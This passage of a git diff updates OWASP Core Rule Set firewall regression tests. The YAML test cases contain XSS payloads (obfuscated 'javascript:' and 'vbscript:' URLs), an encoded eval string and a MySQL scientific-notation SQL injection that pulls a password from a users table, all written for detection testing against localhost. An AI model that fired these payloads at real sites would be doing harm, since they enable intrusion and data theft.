+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: GET
+            port: 80
+            uri: "/get?eval=\u0064\u0032hpbGUodHJ1ZSk7Cg%3D%3D"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934160"
diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml
index 98a7d4d..1a3473e 100644
--- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml
+++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml
@@ -11,9 +11,9 @@ tests:
       - stage:
           input:
             dest_addr: 127.0.0.1
-            method: GET
+            method: POST
             port: 80
-            uri: '/foo'
+            uri: '/post'
             headers:
               User-Agent: "OWASP CRS test agent"
               Host: localhost
@@ -27,13 +27,13 @@ tests:
       - stage:
           input:
             dest_addr: 127.0.0.1
-            method: GET
+            method: POST
             port: 80
-            uri: '/bar'
+            uri: '/post'
             headers:
               User-Agent: "OWASP CRS test agent"
               Host: localhost
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept: "*/*"
             data: 'ja%26tab%3Bvascript%3A%09=941210-2'
           output:
             log_contains: id "941210"
@@ -45,12 +45,12 @@ tests:
             dest_addr: 127.0.0.1
             method: GET
             port: 80
-            uri: '/baz'
+            uri: '/get'
             headers:
               User-Agent: "OWASP CRS test agent"
               Host: localhost
               Cookie: 'ja%26newline%3Bvascript%3A%20=941210-3'
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept: "*/*"
           output:
             log_contains: id "941210"
   - test_title: 941210-4
@@ -61,11 +61,11 @@ tests:
             dest_addr: 127.0.0.1
             method: POST
             port: 80
-            uri: '/'
+            uri: '/post'
             headers:
               User-Agent: "OWASP CRS test agent"
               Host: localhost
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept: "*/*"
               Content-Type: application/json
             data: '{"url":"javascript&#10:alert(7)"}'
             version: HTTP/1.1
@@ -79,11 +79,11 @@ tests:
             dest_addr: 127.0.0.1
             method: POST
             port: 80
-            uri: '/'
+            uri: '/post'
             headers:
               User-Agent: "OWASP CRS test agent"
               Host: localhost
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept: "*/*"
               Content-Type: application/json
             data: '{"url":"jav&#13ascript:alert(7)"}'
             version: HTTP/1.1
diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml
index 32cb91a..f1027bd 100644
--- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml
+++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml
@@ -14,8 +14,9 @@ tests:
             headers:
               Host: localhost
               User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept: "*/*"
             method: POST
+            uri: "/post"
             port: 80
             data: "var=v%26newline;b%26tab;s%26newline;c%26newline;r%26tab;i%26tab;p%26newline;t%26colon;:&var2=whatever"
             version: HTTP/1.0
@@ -30,8 +31,9 @@ tests:
             headers:
               Host: localhost
               User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept: "*/*"
             method: POST
+            uri: "/post"
             port: 80
             data: "payload=<a href=\"vbscript:MsgBox+1\">XSS</a>"
             version: HTTP/1.0
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
new file mode 100644
index 0000000..c97727f
--- /dev/null
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
@@ -0,0 +1,24 @@
+---
+meta:
+  author: "Xhoenix"
+  description: MySQL Scientific Notation bypass payloads Detection
+  enabled: true
+  name: 942560.yaml
+tests:
+  - test_title: 942560-1
+    desc: "Positive test for Scientific Notation in MySQL, e.g 1.e("
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: GET
+            port: 80
+            uri: "/"
+            data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2"
+            version: HTTP/1.0
+          output:
+            log_contains: id "942560"
diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
index 0c2ad19..6dc042e 100644
--- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
+++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "azurit"
+  author: "azurit, Xhoenix"
   enabled: true
   name: "951220.yaml"
   description: "Regression tests for rule 951220"
@@ -25,3 +25,24 @@ tests:
             data: "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning:  mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"
           output:
             log_contains: "id \"951220\""
+
+  - test_title: 951220-2
+    desc: "Matching mssql SQL Information Leakage"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            port: 80
+            headers:
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Accept-Encoding: "gzip,deflate"
+              Accept-Language: "en-us,en;q=0.5"
+              Content-Type: "text/plain"
+            method: "POST"
+            version: "HTTP/1.0"
+            uri: "/post"
+            data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."
+          output:
+            log_contains: "id \"951220\""
diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
index b6c7a43..f82cc79 100644
--- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
+++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "azurit"
+  author: "azurit, Xhoenix"
   enabled: true
   name: "951230.yaml"
   description: "Regression tests for rule 951230"
@@ -25,3 +25,23 @@ tests:
             data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."
           output:
             log_contains: "id \"951230\""
+  - test_title: 951230-2
+    desc: "Matching MySQL SQL Information Leakage"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            port: 80
+            headers:
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Accept-Encoding: "gzip,deflate"
+              Accept-Language: "en-us,en;q=0.5"
+              Content-Type: "text/plain"
+            method: "POST"
+            version: "HTTP/1.0"
+            uri: "/post"
+            data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"
+          output:
+            log_contains: "id \"951230\""
diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
index 1501e64..d9e2697 100644
--- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
+++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "azurit"
+  author: "azurit, Xhoenix"
   enabled: true
   name: "951240.yaml"
   description: "Regression tests for rule 951240"
@@ -25,3 +25,23 @@ tests:
             data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"
           output:
             log_contains: "id \"951240\""
+  - test_title: 951240-2
+    desc: "Matching PostgreSQL Information Leakage"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            port: 80
+            headers:
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Accept-Encoding: "gzip,deflate"
+              Accept-Language: "en-us,en;q=0.5"
+              Content-Type: "text/plain"
+            method: "POST"
+            version: "HTTP/1.0"
+            uri: "/post"
+            data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR:  invalid input syntax for integer"
+          output:
+            log_contains: "id \"951240\""
diff --git a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
new file mode 100644
index 0000000..171c5b6
--- /dev/null
+++ b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
@@ -0,0 +1,87 @@
+---
+meta:
+  author: "M4tteoP"
+  enabled: true
+  name: "953100.yaml"
+  description: "Tests for rule 953100"
+tests:
+  - test_title: 953100-1
+    desc: "'File size is' leads to FPs, it should not match at PL1"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            port: 80
+            headers:
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Accept-Encoding: "gzip,deflate"
+              Accept-Language: "en-us,en;q=0.5"
+              Content-Type: "text/plain"
+            method: "GET"
+            version: "HTTP/1.0"
+            uri: "/anything"
+            data: "Maximum allowed file size is 10 MB"
+          output:
+            no_log_contains: id "953100"
+  - test_title: 953100-2
+    desc: "'Invalid date' Wordpress FP, it should not match at PL1"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            port: 80
+            headers:
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Accept-Encoding: "gzip,deflate"
+              Accept-Language: "en-us,en;q=0.5"
+              Content-Type: "text/plain"
+            method: "GET"
+            version: "HTTP/1.0"
+            uri: "/anything"
+            data: "Invalid date selected"
+          output:
+            no_log_contains: id "953100"
+  - test_title: 953100-3
+    desc: "'The function' might lead to FPs, it should not match at PL1"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            port: 80
+            headers:
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Accept-Encoding: "gzip,deflate"
+              Accept-Language: "en-us,en;q=0.5"
+              Content-Type: "text/plain"
+            method: "GET"
+            version: "HTTP/1.0"
+            uri: "/anything"
+            data: "please review the function"
+          output:
+            no_log_contains: id "953100"
+  - test_title: 953100-4
+    desc: "'Static function' might lead to FPs, it should not match at PL1"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            port: 80
+            headers:
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Accept-Encoding: "gzip,deflate"
+              Accept-Language: "en-us,en;q=0.5"
+              Content-Type: "text/plain"
+            method: "GET"
+            version: "HTTP/1.0"
+            uri: "/anything"
+            data: "This is a static function"
+          output:
+            no_log_contains: id "953100"
diff --git a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml
new file mode 100644
index 0000000..30a2ce7
--- /dev/null
+++ b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml
@@ -0,0 +1,87 @@
+---
+meta:
+  author: "M4tteoP"
+  enabled: true
+  name: "953101.yaml"
+  description: "Tests for rule 953101"
+tests:
+  - test_title: 953101-1
+    desc: "'File size is' leads to FPs at PL1, it should match at PL2"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            port: 80
+            headers:
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Accept-Encoding: "gzip,deflate"
+              Accept-Language: "en-us,en;q=0.5"
+              Content-Type: "text/plain"
+            method: "GET"
+            version: "HTTP/1.0"
+            uri: "/anything"
+            data: "Maximum allowed file size is 10 MB"
+          output:
+            log_contains: id "953101"
+  - test_title: 953101-2
+    desc: "'Invalid date' leads to FPs at PL1, it should match at PL2"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            port: 80
+            headers:
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Accept-Encoding: "gzip,deflate"
+              Accept-Language: "en-us,en;q=0.5"
+              Content-Type: "text/plain"
+            method: "GET"
+            version: "HTTP/1.0"
+            uri: "/anything"
+            data: "Invalid date selected"
+          output:
+            log_contains: id "953101"
+  - test_title: 953101-3
+    desc: "'The function' might lead to FPs at PL1, it should match at PL2"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            port: 80
+            headers:
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Accept-Encoding: "gzip,deflate"
+              Accept-Language: "en-us,en;q=0.5"
+              Content-Type: "text/plain"
+            method: "GET"
+            version: "HTTP/1.0"
+            uri: "/anything"
+            data: "Please review the function"
+          output:
+            log_contains: id "953101"
+  - test_title: 953101-4
+    desc: "'Static function' might lead to FPs at PL1, it should match at PL2"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            port: 80
+            headers:
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Accept-Encoding: "gzip,deflate"
+              Accept-Language: "en-us,en;q=0.5"
+              Content-Type: "text/plain"
+            method: "GET"
+            version: "HTTP/1.0"
+            uri: "/anything"
+            data: "This is a static function"
+          output:
+            log_contains: id "953101"
diff --git a/version.go b/version.go
index 2f95360..2030bff 100644
--- a/version.go
+++ b/version.go
@@ -7,5 +7,5 @@
 package main
 
 const (
-	crsVersion = "0a1ced3993d4fea76a14ad6350cc2737c1bb08e6"
+	crsVersion = "2b92d53ea708babbca8da06cd13decffbc9e31b5"
 )